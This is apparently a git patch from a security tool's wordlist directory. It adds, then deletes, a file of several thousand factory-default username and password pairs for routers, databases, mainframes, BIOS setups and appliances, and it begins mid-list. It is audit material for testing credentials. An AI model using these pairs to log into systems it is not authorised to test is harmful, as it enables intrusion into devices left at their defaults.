LASER +tutor + ?award +root changethis +DISKCNT +default WLAN_AP +SYSERR +WWW WWW +VAX VAX +none none + Cable-docsis +PROCAL +SUPERVISOR SYSTEM +FAXWORKS +ibm password +CTXSYS UNKNOWN +LDAP_Anonymous LdapPassword_1 +(any 3 chars) cascade +games +User 1234 + Zenith +setup/snmp setup/nopasswd +DSGATEWAY DSGATEWAY +AWARD_SW +CSMIG CSMIG + year2000 +umountfsys umountfsys + BIGO +root jstwo +VMS VMS +dni +bpel bpel +viewuser viewuser1 +admin ISPMODE +TDISK +politically correct +user_analyst demo +admin conexant +guest 1234 +root logapp +admin ip3000 +RSCS +COMPIERE COMPIERE +OSP22 OSP22 +guest1 guest1 +FORSE FORSE + lesarotl +factory factory +bubba (unknown) +admin ip20 +admin ip21 +LASER +QUSER QUSER + AWARD SW +primeos prime +admin tr650 +poll poll + j262 + xljlbj +glftpd glftpd + Advance +RMAN RMAN +mountfs mountfs +DIRECT + console +firstsite firstsite + SW_AWARD +IPFSERV + snake +Administrator Gateway +TSUSER TSUSER +BATCH2 +admin 123123 + 3098z + cc +snmp nopasswd +WebAdmin WebBoard +IBMUSER SYS1 +SMART +voadmin manager +BC4J BC4J +core phpreactor +OPERVAX OPERVAX +Bobo hello + Congress + central +WANGTEK WANGTEK +disttech etas +OWA OWA +USER2 USER2 +jasperadmin jasperadmin +FIELD DIGITAL +root uClinux +guest guestgue +FAXUSER FAXUSER +WINSABRE SABRE +VMBSYSAD +admin ip400 +PVM +ctb_admin sap123 + AMI.KEY + AMI.KEZ +  ANYCOM +USER_TEMPLATE +DEMO4 + inuvik49 +QSRV 11111111 +qsrv qsrv +superdba admin +PORTAL30 PORTAL31 +PORTAL30 PORTAL30 +XPRT XPRT +Crowd password +User 19750407 +18364 + zjaaadc +ilom-admin ilom-admin +rdc123 rdc123 +sysopr sysopr +tasman tasmannet +SYSTEM 0RACLE8I + Cisco router +admin store + SER +blank blank +ADMIN PASSWORD +admin IP address +WEBREAD WEBREAD +ODM ODM +11111111 11111111 +prime prime +AURORA$ORB$UNAUTHENTICATED INVALID +ADAMS WOOD +root vertex25 +sys bin +lp lineprin +Craft crftpw +www www +postgres dbpass +rfmngr $rfmngr$ +sync sync +WANGTEK + 1988 +MAINT +SYSTEST_CLIG SYSTEST +user user0000 +user_approver demo +ilom-operator ilom-operator +Nice-admin nicecti + HELGA-S +answer +NETNONPRIV NETNONPRIV +nuucp +CIDS CIDS +VASTEST +primenet primenet +redline redline + rw +spcl 0000 +admin muze +MBMANAGER MBMANAGER +webmaster +APPLSYS FND + ro +WINDOWS_PASSTHRU WINDOWS_PASSTHRU +USER4 USER4 +hqadmin hqadmin +UOMNI_ +FIELD TEST +sys system +Admin 123qwe +VMUTIL +POST BASE + dn_04rjc +uucpadm uucpadm +halt +FAXWORKS FAXWORKS +admin password1 +EXFSYS EXFSYS +4Dgifts +JMUSER JMUSER +admin imsa7.0 +SUPERVISOR NETFRAME +CIS CIS +UNITY_ + ciscofw +HLW HLW +admin brocade1 +pwrchute pwrchute + setup + Tiny +IDMSSE +postgres svcPASS83 +NSA nsa +!root !ishtar +admin blank +root NeXT +TELEDEMO TELEDEMO + AMIDECOD +recover recover +TRAVEL TRAVEL +lexar + efmukl +viewer +LIBRARY +admin raritan +PO8 PO8 +root@localhost root +NAMES NAMES +secofr secofr +PDMREMI + biostar +MGE VESOFT +USER7 USER7 +OWA_PUBLIC OWA_PUBLIC +questra questra +builtin builtin +SFCNTRL +SAP* 6071992 +boss boss +anonymous password + isolation + Q54arwms +PLEX PLEX +OLAPDBA OLAPDBA + g6PJ +OLAPSVR INSTANCE +user_expert demo +root pixmet2003 +Bhosda Lund +TEST +qsvr ibmcel +CMSBATCH CMSBATCH + ABCD +gropher + AM +administrator admin + condo + Toshiba + familymacintosh +TAHITI TAHITI +NEWINGRES NEWINGRES + AMI?SW + mMmM +man man +VM3812 +root powerapp +ibm service +VIF_DEVELOPER VIF_DEV_PWD +ADMIN WELCOME +Admin Barricade +joeuser joeuser +system isp +IPC +HELPDESK HELPDESK +wlpisystem wlpisystem +TSAFVM +prtgadmin prtgadmin +SYSTEM CHANGE_ON_INSTALL + CONCAT + t0ch88 +webmaster webmaster + djonet +ADMIN changeme +Any + Compaq +UAMIS_ +theman changeit +CISINFO CISINFO +mobile dottie +QS_CB QS_CB +CDEMORID CDEMORID +tech nician +DEMO2 +administrator none +SYS MANAG3R +End User 7936 +PORTAL30_PUBLIC PORTAL30_PUBLIC +sysadmin nortel +SYS D_SYSTPW +SYSTEM SYSPASS +Guest blank +User User +MDDEMO_CLERK CLERK +FIELD FIELD +Admin SECRET123 +Guest Guest +PHANTOM +admin amigosw1 + xmux +write +ADMINISTRATOR SENTINEL +system field + ducati900ss +qsecofr 22222222 + lkw peter + awkward + TzqF +SYSTEST_CLIG SYSTEST_CLIG +ODS ODS +admin axis2 +BLAKE PAPER +TSDEV TSDEV +PRODBM +admin letmein + joh316 +dos dos +login 0000 +APL2PP +system hdms +admin phplist +god1 12345 +admin novell +CICSUSER CISSUS +22222222 22222222 +root passw0rd +user_publisher demo +OSE$HTTP$ADMIN (random password) +def trade +SuperUser kronites +QS_CBADM QS_CBADM +SYSA SYSA + 00000000 +STUDENT STUDENT +Draytek 1234 +SMDR SECONDARY +EREP +VSEMAN + OOOOOOOO +primos_cs prime +demo +fwadmin xceladmin + j64 +MTS_USER MTS_PASSWORD + AWARD_SW +AQDEMO AQDEMO +private ReadWrite access secret + GWrv + MagiMFP + SnuFG5 +IS_$hostname IS_$hostname +HPSupport badg3r5 +ORASSO ORASSO +GATEWAY + t0ch20x +CVIEW +SH SH + zeosx +XXSESS_MGRYY X#1833 + wodj + FOOBAR +SYSMAN SYSMAN +VMMAP +admin urchin +PORTAL30_DEMO PORTAL30_DEMO +Ezsetup +QS_CS QS_CS +administrator PlsChgMe! +CMSUSER + MCUrv +DEMO1 +admin adminadmin +userNotUsed userNotU + AMI~ +root ibm +ncadmin ncadmin +TESTPILOT TESTPILOT + Polrty +fg_sysadmin password +UETP UETP +QS QS +DBI MUMBLEFRATZ +  ILMI +SYSTEM SYS +JWARD AIROPLANE +APPS_MRC APPS_MRC + uboot +Moe hello +SENTINEL SENTINEL +admin netgear1 +Yak asd123 +PDP11 PDP11 + aammii +Flo hello +SLIDE SLIDEPW +root bagabu +primeos primeos + Spacve + 256256 +INFO INFO +checkfsys checkfsys +PRODCICS PRODCICS + foolproof + AWARD_PW +MXAGENT MXAGENT +SYSTEM ORACLE8I +admin no password +VMTLIBR +POWERCARTUSER POWERCARTUSER +VMBACKUP +CPNUC + QDI + shiva +distrib distrib0 +SUPERVISOR SUPERVISOR +SYSMAINT SERVICE +MIGRATE MIGRATE +CDEMOUCB CDEMOUCB +system prime +QSRV 22222222 + c +OLTSEP +sysbin sysbin +signa signa +autocad autocad + SWITCHES_SW +WEBDB WEBDB +daemon + aPAf +ncrm ncrm +SAMPLE SAMPLE + 1 +HCPARK HCPARK +ALLINONE ALLINONE +nm2user nm2user +SAVSYS +IIPS +PATROL PATROL + technolgi + MBIU0 +mailadmin secret +adm adm +TMSADM +tutor tutor +ESubscriber +CHEY_ARCHSVR CHEY_ARCHSVR +write synnet +software software +admin welcome +god2 12345 +bbs bbs + Dell +disttech disttech +FSFTASK2 + zbaaaca + prost +ORDSYS ORDSYS +Administrator administrator + 1234567890 +gopher gopher +PSFMAINT +SYSTEM MANAG3R + RM + s!a@m#n$p%c +EAdmin +12345 12345 +DECNET DECNET +OPERATIONS OPERATIONS +$system +REP_OWNER DEMO +PANAMA PANAMA +LIBRARIAN SHELVES +SYSTEM 0RACLE +fal +4Dgifts 4Dgifts + biosstar +NETSERVER NETSERVER + tiny +root TANDBERG +POWERCHUTE APC +USER5 USER5 +GPFD GPFD + 12345678 +blank admin +QS_OS QS_OS +sysadm admin +REPADMIN REPADMIN +Administrator 12345678 +0 0 +DEMO8 DEMO8 +DEMO9 DEMO9 +CDEMO82 CDEMO82 +admin boca raton +Administrator vision2 +administrator 0 +umountsys umountsys +snmp snmp +Username PASSWORD +volition +USER0 USER0 +CDEMOCOR CDEMOCOR +SYSTEST UETP +Rodopi Rodopi +DECNET NONPRIV +user_checker demo + tatercounter2000 +qserv qserv + ESSEX or IPC +AQ AQ +support +SAPR3 SAP +VRR1 VRR1 +fastwire fw +admi admin +FINANCE FINANCE +WinCCAdmin 2WSXcder +ESTOREUSER ESTORE +fax fax +VIRUSER VIRUSER +LINK LINK +APPLSYSPUB FNDPUB + BIOS +SYS ORACLE8 +SYS ORACLE9 +overseer overseer +checksys checksys +umountfs umountfs +DBDCCICS DBDCCIC +Admin password + x6zynd56 +TOAD TOAD +root mozart +ntpupdate ntpupdate +root router +MDDEMO_MGR MGR +ARCHIVIST +SUPERVISOR HARRIS + 11111 +billy-bob +lp bin +DECMAIL DECMAIL +alien alien +admin dnnadmin +nsroot nsroot +AdvWebadmin advcomm500349 +dvstation dvst10n +SERVICECONSUMER1 SERVICECONSUMER1 +MMO2 MMO2 +qsecofr 11111111 +NOC NOC +WWWUSER WWWUSER +root Serial port only +SAP SAPR3 +root t0talc0ntr0l4! +NEVIEW +MAIL +ODSCOMMON ODSCOMMON +fal fal +pixadmin pixadmin +ripeop +PENG + BIOSPASS +netlink netlink +L2LDEMO L2LDEMO +OUTLN OUTLN +12.x +scott tiger or tigger + toshy99 +dbase dbase + nz0u4bbe +fam fam + bell9 +Oper Oper +RMAIL RMAIL +administrator 19750407 +FND FND +admin exinda +PRIV PRIV +admin barney +SETUP + biodata + 24Banc81 +news news +VSEIPO + j09F +pw pw +GUEST +ilon ilon + award_? +SYS 0RACLE39 +SYS 0RACLE38 +DEFAULT DEFAULT + AMI!SW +PLSQL SUPERSECRET +root alpine +politcally correct +18140815 18140815 +APPUSER APPUSER +SUPERVISOR +CENTRA CENTRA +LBACSYS LBACSYS + alfarome +PDP8 PDP8 +SFCMI +administrator * * # +lpadm lpadm +Test Everything +bewan bewan + 2580 +DIP DIP + Sxyz +mfd mfd +MDDEMO MDDEMO + intermec + 589589 +SWPRO SWPRO +DES DES +root fibranne +Coco hello +GCS +rodopi rodopi + touchpwd= +Scott Tiger +Admin5 4tugboat +admin funkwerk +ANDY SWORDFISH +DESQUETOP +nobody +Manager 657 + mysweex +SYSTEM SYSLIB +NETCON NETCON +JONES STEEL +author author +MOESERV +web web +tech User +PUBSUB1 PUBSUB1 +SYS D_SYSPW +CATALOG CATALOG + IBM + Guest +SQLUSER +RE RE +REPORTS_USER OEM_TEMP +MFG MFG +POST POST +HPLASER HPLASER +HR HR +VIDEOUSER VIDEO USER +DBA SQL + CMOSPWD +guest1 guest +superuser asante +SYSTEM 0RACLE38 +SYSTEM 0RACLE39 +AUTOLOG1 +dadmin dadmin +AURORA$JIS$UTILITY$ +wlcsystem wlcsystem +news +CPRM From 7d79f8a4c28a4c0ef0b78db0637a3c055a81cd32 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Sun, 18 May 2014 18:15:17 +0200 Subject: [PATCH 20/33] Removed wrongly named list. --- .../default_passwords_large_unhash.txt | 1787 ----------------- 1 file changed, 1787 deletions(-) delete mode 100644 data/wordlists/default_passwords_large_unhash.txt diff --git a/data/wordlists/default_passwords_large_unhash.txt b/data/wordlists/default_passwords_large_unhash.txt deleted file mode 100644 index ff0458f94b..0000000000 --- a/data/wordlists/default_passwords_large_unhash.txt +++ /dev/null @@ -1,1787 +0,0 @@ -admin admin - -admin - admin -admin password -admin 1234 -root -Administrator admin -admin epicrouter -sysadm sysadm - 1234 - password - access -root root -tech tech - smcadmin - 0 -Administrator -root pass - system -root admin - PASSWORD - Symbol -operator -guest guest -admin bintec -security security -guest -debug synnet -manager manager - adtran -admin motorola -service smile - cascade -admin 0 -!root -user password - BRIDGE -netman netman -super super -admin switch -admin setup -admin changeme -diag switch -operator operator -user user -user -Cisco Cisco -Manager Manager -DTA TJM -apc apc -tech - cisco -User -root 1234 -Admin - letmein -cablecom router -adm -wradmin trancell - ascend -manager friend - NetICs -root blender -netscreen netscreen - sysadm - SKY_FOX -sa - public - Master -setup setup -root default - laflaf -cmaker cmaker -enable -MICRO RSX -login admin - Posterie -write private -root attack -monitor monitor - private - xdfk9874t3 -netopia netopia - Col2ogro2 -admin microbusiness -op op -adminview OCS -op operator -admin secure -admin atlantis -sysadmin sysadmin -super 5777364 -echo echo -craft -adm cascade -admin default -maint maint -comcast 1234 -CSG SESAME -diag danger -readonly lucenttech2 -admin operator -Manager -debug d.e.b.u.g -admin hello - SYSTEM -root ascend -root calvin -manuf xxyyzz -cusadmin highspeed -admin 123 -smc smcadmin -admin Sharp -root password -sweex mysweex -disttech 4tas -su super -admin system -root changeme -poll tech -sysadmin password -SYSDBA masterkey -anonymous - 0000 -root permit -admin barricade -support support -root tslinux -admin hp.com -recovery recovery -USERID PASSW0RD -eng engineer -administrator administrator -admin pwp -admin isee -NETWORK NETWORK -JDE JDE -admin superuser -Guest - Super -admin admin123 -super surt -rwa rwa -admin 123456 -admin NetCache - ADTRAN -USER USER -test test -admin extendnet -admin ironport -lp lp - Cisco -administrator -admin 1111 -sysadmin PASS -ro ro -admin Ascend - _Cisco -MAIL MAIL -ami - sitecom -hsa hsadb -system password -MGR CAROLIAN -ADMINISTRATOR ADMINISTRATOR -admin sysAdmin -root tini -admin smcadmin - Helpdesk -FIELD SERVICE -PBX PBX -netman -HELLO FIELD.SUPPORT -system sys -hscroot abc123 -1502 1502 - star -superuser admin -HELLO MGR.SYS -sysadm anicust -Administrator Administrator -netrangr attack - Intel - 12345 -readwrite lucenttech1 - secret -piranha piranha -wlse wlsedb -admin cisco -l3 l3 -admin diamond -none admin -naadmin naadmin -public public -admin 1988 -admin radius -admin root -NETOP -Administrator letmein -HELLO MANAGER.SYS - raidzone - 3ascotel -MANAGER HPOFFICE -demo demo - 166816 -User Password -admin zoomadsl -D-Link D-Link -user public -user pass -l2 l2 -MGR CCC -rw rw -cgadmin cgadmin -storwatch specialist - secure -vcr NetVCR -OPERATOR COGNOS -piranha q -admin synnet -MDaemon MServer -root cms500 -root davox -jagadmin -enquiry enquirypw -at4400 at4400 -support h179350 -davox davox -admin asd -PFCUser 240653C9467E45 -setup changeme -superuser superuser - atc123 -aaa -root admin_1 - 266344 -MGR WORD -topicalt password -admin2 changeme -1234 1234 -MANAGER ITF3000 - connect -FIELD HPONLY -nms nmspw -client client -admin comcomcom - speedxess -MGR ROBELLE - epicrouter -sys uplink -OPERATOR SYSTEM -field support -MGR SYS -root letacla - FORCE -deskman changeme -MAIL REMOTE -SYSADM sysadm -superadmin secret - backdoor -pmd -MGR CNAS -admin 22222 -GEN2 gen2 - medion -ADMN admn -Factory 56789 -PRODDTA PRODDTA -tellabs tellabs#1 -spcl 0 -dadmin dadmin01 - comcomcom -administrator password -helpdesk OCS -dhs3mt dhs3mt -MGR SECURITY -setup changeme! -install llatsni -adfexc adfexc -IntraSwitch Asante -manage !manage -superman 21241036 -MANAGER TELESUP -craft crftpw -login 0 - help -MGR HPOFFICE - lantronix -SPOOLMAN HPOFFICE -manager admin - netadmin -ADVMAIL HP -FIELD SUPPORT -MANAGER SYS -MGR VESOFT -vt100 public -PSEAdmin $secure$ -HELLO OP.OPERATOR -Manager friend - hs7mwxkk -patrol patrol - SUPER - SMDR - 1064 -teacher password -PCUSER SYS -MGR ITF3000 -Any 12345 -OPERATOR DISC -RSBCMON SYS -cellit cellit -MGR INTX3 -inads inads -halt tlah -root wyse -locate locatepw -admin visual -TMAR#HWMT8007079 -rapport r@p8p0r+ -MGR TELESUP -xbox xbox - TENmanUFactOryPOWER -device device -NICONEX NICONEX -admin admin1234 -root fivranne -acc acc -31994 31994 -admin netadmin -bcim bcimpw -websecadm changeme -blue bluepw -topicnorm password -supervisor PlsChgMe - R1QTPS -MGR HPONLY -ccrusr ccrusr -root Cisco -login password -266344 266344 -MAIL MPE -telecom telecom -MAIL HPOFFICE -GEN1 gen1 -Administrator smcadmin -SSA SSA - snmp-Trap -HTTP HTTP - default -mtch mtch -admin adslolitec -Administrator ganteng -bciim bciimpw -browse browsepw -Admin Admin - Password -hydrasna -sys change_on_install -deskres password -bbsd-client changeme2 -anonymous Exabyte -admin rmnetlm -replicator replicator -intel intel -OPERATOR SUPPORT -MGR HPP196 -radware radware -intermec intermec -mlusr mlusr -MGR RJE -FIELD LOTUS -init initpw -e250 e250changeme -MAIL TELESUP -Polycom SpIp -temp1 password - adminttd -tech field -support supportpw -mac - MiniAP -MANAGER SECURITY -3comcso RIP000 -RMUser1 password -WP HPOFFICE -Administrator changeme -MGR XLSERVER -MGR HPP187 -MGR HPP189 -inads indspw -admin linga -craft craft - enter -NAU NAU -rcust rcustpw -admin AitbISP4eCiG -mtcl mtcl -MGR CONV -topicres password -bcnas bcnaspw -MGR NETBASE -admin access -public -adminuser OCS -MGR REGO -Root -cac_admin cacadmin -mediator mediator -superman talent -Anonymous -kermit kermit -admin x-admin -MGR HPDESK - 9999 -root ROOT500 -admin my_DEMARC -volition volition -GlobalAdmin GlobalAdmin - 4getme2 -LUCENT01 UI-PSWD-01 -admin 2222 -LUCENT02 UI-PSWD-02 -MANAGER TCH -adminstat OCS -desknorm password -IntraStack Asante -OPERATOR SYS -MGR COGNOS - Fireport - ILMI -maint maintpw -supervisor supervisor -e500 e500changeme -admin mu -MANAGER COGNOS -deskalt password -admin OCS -bbsd-client NULL -cust custpw -admin noway -tiara tiaranet -bcms bcmspw - TANDBERG -m1122 m1122 -telco telco -superuser -xd xd -dhs3pms dhs3pms -VNC winterm -craft craftpw -maint rwmaint -anonymous any@ -login access -browse looker -customer none -cisco cisco -adminstrator changeme -FIELD MANAGER - 1234admin -FIELD MGR -ftp_nmc tuxalize -me -iclock timely -echo User -ADVMAIL HPOFFICE DATA -login 1111 -login 8429 -Administrator manage - Babylon -admin hagpolm1 -root 12345 -scmadmin scmchangeme -user tivonpw -sysadm Admin -Administrator password -admin administrator -installer installer -webadmin webadmin -ftp_inst pbxk1064 -DDIC 19920706 - pento -admin NetSurvibox -SYSTEM D_SYSTPW -draytek 1234 - 3477 -operator $chwarzepumpe -administrator asecret -EARLYWATCH SUPPORT - 10023 -Manager Admin -super.super -ftp_oper help1954 -corecess corecess -superuser 123456 -admin Password -super.super master -admin Protector -SYSTEM MANAGER -webadmin 1234 -install secret -FIELD HPWORD PUB -admin 12345 -admin symbol -weblogic weblogic -Admin 1988 -system/manager sys/change_on_install -root 3ep5w2u - 8111 - jannie -End User 123 -none 0 -d.e.b.u.g User -admin tomcat -target password -Administrator pilou -MD110 help -Administrator 3ware - ANYCOM -tiger tiger123 -adminttd adminttd -admin asante -admin smallbusiness -admin netscreen -FIELD HPP187 SYS -guest User -maint ntacdmax -admin w2402 -wlseuser wlsepassword -SAPCPIC admin -ftp_admi kilo1987 -admin articon -mtcl -default.password -admin michelangelo -manager changeme -root Mau'dib - Serial Num -root ggdaseuaimhrke -7 maintain -2 syslib -ADMIN admin -system weblogic -Administrator ggdaseuaimhrke -ADMIN -itsadmin init -PUBSUB PUBSUB -admin demo -system manager -sys sys -CTXSYS CTXSYS -ftp -bill bill -192.168.1.1 60020 @dsl_xilno -FIELD -admin dmr99 -setpriv system -GUEST GUEST -SAP* 06071992 -operator 1234 -t3admin Trintech -hello hello -supervisor -CISCO15 otbu+1 -1.79 Multi - babbit -mso w0rkplac3rul3s -Telecom Telecom -qsysopr qsysopr -admin TANDBERG -admin imss7.0 - nokia -APPS APPS -Developer isdev -mail mail -admin draadloos -qsecofr qsecofr -11111 x-admin - default.password -Service 5678 -enable cisco -netadmin nimdaten -Polycom 456 -admin P@55w0rd! -admin 1234admin -root par0t -any system -db2fenc1 db2fenc1 -johnson control -2 maintain -isp isp -demos -QSRV QSRV -root iDirect -MDSYS MDSYS -Admin 123456 -2 manager -vpasp vpasp -TEST TEST - Telecom -QSECOFR QSECOFR -adm none - 2501 -1 syslib -system security -admin leviton -!root blank -informix informix -root mpegvideo -5 games -root 0P3N -engmode hawk201 -scout scout -qpgmr qpgmr -admin admin000 -ADSL expert03 -cisco -images images -admin security -admin surecom -Gearguy Geardog - symantec -comcast -admin adslroot -1 manager -Demo - xyzzy -Administrator adaptec -system system -SAP* PASS -serial# serial# -BACKUP BACKUP -stratacom stratauser -root rootme -6.x -root !root -webadmin webibm - riverhead -mary password -COMPANY COMPANY -SYS SYS -DSL DSL -Jetform -none amber -eagle eagle -ROUTER -root brightmail -admin pass - HEWITT RAND -ods ods -siteadmin toplayer -admin OkiLAN -root rootpass -Alphanetworks wrgg15_di524 - x40rocks - nokai -Admin1 Admin1 -field field -Admin admin -Admin ImageFolio - iolan - manager -admin pfsense -janta sales janta211 -servlet manager -username password -citel password -Replicator iscopy -SYSMAN OEM_TEMP -1 operator -SYSTEM SYSTEM -administrator RSAAppliance -master themaster01 -Admin 1234 -2 operator -SUPERUSER ANS#150 -admin passwort -cn=orcladmin welcome -30 games -maintainer admin -setup - hello -admin NetSeq -BRIO_ADMIN BRIO_ADMIN - citel -internal oracle -CQSCHEMAUSER PASSWORD -root kn1TG7psLu -SYS SYSPASS - lkwpeter -DEV2000_DEMOS DEV2000_DEMOS -FSFTASK1 -checkfs checkfs -BACKUP -USER1 USER1 -root TENmanUFactOryPOWER -SQLDBA -root resumix -HELP HELP -toor logapp -SYS 0RACLE9 -SYS 0RACLE8 - 57gbzb -!root none -qsrvbas qsrvbas -SYSADMIN -EZsetup -Administrator 1234 - sldkj754 -BATCH -STRAT_USER STRAT_PASSWD -Administrator 19750407 - User -user USERP -primenet primeos -OEMREP OEMREP -admin [^_^] -USER6 USER6 -lynx - TTPTHA -powerdown powerdown -root Mau’dib -SYSTEM ORACL3 -$ALOC$ -password -VOL-0215 -admin nimda -tomcat tomcat -REP_MANAGER DEMO -WinCCConnect 2WSXcder -ALLIN1 ALLIN1 -DIRMAINT -eqadmin Serial port only equalizer -sysadm sysadmpw -QSRVBAS QSRVBAS -admin ip305Beheer -debug tech - ACCORD -AQJAVA AQJAVA -LASERWRITER LASERWRITER -Administrator 0000 -root nsi -PERFSTAT PERFSTAT -apcuser apc -MBWATCH MBWATCH - protection -system_admin -unix unix -OWNER OWNER -NETPRIV NETPRIV -VSEMAINT - AWARD?SW -DEMO DEMO -tomcat changethis -SYMPA SYMPA -REP_OWNER REP_OWNER -DCL DCL -FAX -root dbps -ARCHIVIST ARCHIVIST -USER PASSWORD -VTAMUSER -LASERWRITER -VMTAPE -basisk basisk -NetLinx password -OutOfBox demos guest 4DGifts (none by default) -none letmein -NETMGR NETMGR -DEFAULT USER -OAS_PUBLIC OAS_PUBLIC -read -AP AP -demos demos -SYSTEM Admin -admin j5Brn9 -MTSSYS MTSSYS -SYSMAINT DIGITAL -AUDIOUSER AUDIOUSER -Joe hello -IDMS - teX1 -admin allot -$SRV $SRV -snake -SYS 0RACLE -ADVMAIL -Administrator nicecti -ROOT ROOT -PRINTER PRINTER -shutdown -satan - m1link -RDM470 -master access - l2 - l1 -trouble trouble -fax -OP1 -admin@example.com admin -root trendimsa1.0 -HOST HOST -ADLDEMO ADLDEMO -QS_ADM QS_ADM -bin sys - AMI -OPER OPER -oracle -jj -PO7 PO7 -SYSTEM 0RACLE8 -SYSTEM 0RACLE9 -www -joe password - komprie - 123 -MAINT MAINT -CMSBATCH -root toor -CCC -role1 tomcat -DATAMOVE -lp - AMISETUP - sp99dd -halt halt -MSHOME MSHOME -ISPVM -crowd­-openid-­server password -user_editor demo -sedacm secacm -ROOT -Admin 3Com -db2admin db2admin -Airaya Airaya -supervisor visor -none Wireless -SYSDUMP1 -IMEDIA IMEDIA - Biostar -install install -primos_cs primos -admin infrant1 -Administrator Partner - Administrative -USER_TEMPLATE USER_TEMPLATE -pnadmin pnadmin - h6BB -lpadmin lpadmin -guest none -VTAM VTAM -TRACESVR TRACE -POSTMASTER POSTMASTER -MAILER MAILER -RSCSV2 -QS_WS QS_WS - sma -system_admin system_admin -circ -Demo password - rwa -nobody nobody -Tasman Tasmannet -admin !admin -DISCOVERER_ADMIN DISCOVERER_ADMIN -VMASMON -LR-ISDN LR-ISDN -TURBINE TURBINE -GL GL -PO PO - AMI_SW -super superpass -PRINT -MODTEST YES -GATEWAY GATEWAY -root system -PRIMARY PRIMARY -both tomcat - award.sw -haasadm lucy99 -pw pwpw -games games -DOCSIS_APP 3Com -bbs -EMP EMP -Admin cclfb -postmaster -SITEMINDER SITEMINDER -Any Any -vgnadmin vgnadmin -RJE RJE -gonzo -NEWS NEWS -sa Ektron - Award -AQUSER AQUSER -UTLBSTATU UTLESTAT - AMIAMI -netbotz netbotz -CTXSYS CHANGE_ON_INSTALL -xmi_demo sap123 - Crystal - Daewuu -ftp ftp -ORACACHE (random password) -MCUser MCUser1 -prash hello -sync -sysadm admpw -root rootadmin -PM PM -AP2SVP -master master -ibm 2222 -ULTIMATE ULTIMATE -SABRE -role1 role1 -user_pricer demo -admin enhydra -SUPERVISOR NF -EVENT EVENT - xyzall - rainbow -ADMIN JETSPEED -SYS ORACL3 -PORTAL30_SSO_PS PORTAL30_SSO_PS -FSFADMIN -OO OO -WKSYS WKSYS -OPERATNS OPERATNS - ksdjfg934t -UVPIM_ - merlin -OE OE -Any Local User Local User password -OCITEST OCITEST -web - HLT -ADMINISTRATOR admin -ESSEX - last -CTXSYS -None xyzzy -CTXDEMO CTXDEMO -user_designer demo - Admin - zebra -QDBA QDBA -role changethis -LRISDN LRISDN -tele tele -WEBCAL01 WEBCAL01 -rsadmin rsadmin -OMWB_EMULATION ORACLE -root alien -WINDOWS_PASSTHRU - sanfran -public ReadOnly access secret - AMIPSWD -MOREAU MOREAU -fast abd234 -root QNX -host dnnhost -administrator root -admin public -SYSTEM ORACLE - sertafu -ORDPLUGINS ORDPLUGINS -SYSWRM -mail - telos -ADMIN ADMIN -administrator adminpass -savelogs crash - ACCESS -SDOS_ICSAP SDOS_ICSAP -system adminpwd -BATCH BATCH -GUEST GUESTGUEST -SYSMAINT SYSMAINT -postmaster postmast -DSSYS DSSYS - award_ps - ZAAADA -MGWUSER MGWUSER - NTCIP -OPERATOR - hewlpack -TDOS_ICSAP TDOS_ICSAP -ssp ssp -EJSADMIN EJSADMIN - damin -INGRES INGRES -DS - A.M.I -estheralastruey - 1322222 -VCSRV VCSRV -Administrator storageserver -ssladmin ssladmin -CLARK CLOTH -shutdown shutdown -administrator 1234 -OEMADM OEMADM -restoreonly restoreonly1 -quser quser -PRINTER -MILLER MILLER -trmcnfg trmcnfg -REPORT REPORT -user_author demo - aLLy -dpn changeme -tour tour -mountfsys mountfsys -http -PROG PROG - iwill -openfiler password - Public -admin mp3mystic -RAID hpt -read synnet -admin peribit -STARTER STARTER -FAXUSER -GUEST GUESTGUE -DSA - guardone -daemon daemon -mountsys mountsys -SYSTEM ORACLE9 -SYSTEM ORACLE8 - gandalf -backuponly backuponly1 -IVPM1 - leaves -sysadm syspw -root blablabla - Compleri -USER3 USER3 -OPENSPIRIT OPENSPIRIT - spooml - changeit - wg -prime primeos -HPLASER - Vextrex -CSPUSER -qsvr qsvr -lynx lynx -SYSCKP -root letmein -Sysop Sysop -user_marketer demo -IMAGEUSER IMAGEUSER -root Password -bsxuser bsxpass -MASTER PASSWORD -USER9 USER9 -root ax400 -OLAPSYS MANAGER -SYSTEM OPERATOR -oracle oracle -root Mau?dib - MASTER -root t00lk1t -rsadmin - Daytec -OutOfBox - SZYX - cmaker - CTX_123 -rje rje -ODM_MTR MTRPW -QS_ES QS_ES -lansweeperuser mysecretpassword0* -DEMO3 -Username password -GPLD GPLD -uucp uucp -DBSNMP DBSNMP -VMARCH -GUEST TSEUG -SWUSER SWUSER -root 8RttoTriz -VTAM -OPERATNS -Operator Operator -CHEY_ARCHSVR -SYS ORACLE -roo honey -n.a guardone -accounting accounting -backuprestore backuprestore1 -PRINT PRINT - j322 - Craftr4 -dni dni -WEBADM password -iceman -guru *3noguru -FAX FAX -anon anon - j256 -USER8 USER8 -root honey -PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC - 589721 -postgres -WINSABRE WINSABRE -USERP USERP -none public -Admin shs -SYS MANAGER -IVPM2 -PORTAL30_SSO PORTAL30_SSO -ALLIN1MAIL ALLIN1MAIL -POST -TEMP - xo11nE -admin nms -SYSADM SYSADM -BATCH1 -me me -SUPERVISOR NFI -PROMAIL -SECDEMO SECDEMO -ARAdmin AR#Admin# -sadmin -ORAREGSYS ORAREGSYS -VMASSYS -man -FROSTY SNOWMAN -LASER LASER -tutor - ?award -root changethis -DISKCNT -default WLAN_AP -SYSERR -WWW WWW -VAX VAX -none none - Cable-docsis -PROCAL -SUPERVISOR SYSTEM -FAXWORKS -ibm password -CTXSYS UNKNOWN -LDAP_Anonymous LdapPassword_1 -(any 3 chars) cascade -games -User 1234 - Zenith -setup/snmp setup/nopasswd -DSGATEWAY DSGATEWAY -AWARD_SW -CSMIG CSMIG - year2000 -umountfsys umountfsys - BIGO -root jstwo -VMS VMS -dni -bpel bpel -viewuser viewuser1 -admin ISPMODE -TDISK -politically correct -user_analyst demo -admin conexant -guest 1234 -root logapp -admin ip3000 -RSCS -COMPIERE COMPIERE -OSP22 OSP22 -guest1 guest1 -FORSE FORSE - lesarotl -factory factory -bubba (unknown) -admin ip20 -admin ip21 -LASER -QUSER QUSER - AWARD SW -primeos prime -admin tr650 -poll poll - j262 - xljlbj -glftpd glftpd - Advance -RMAN RMAN -mountfs mountfs -DIRECT - console -firstsite firstsite - SW_AWARD -IPFSERV - snake -Administrator Gateway -TSUSER TSUSER -BATCH2 -admin 123123 - 3098z - cc -snmp nopasswd -WebAdmin WebBoard -IBMUSER SYS1 -SMART -voadmin manager -BC4J BC4J -core phpreactor -OPERVAX 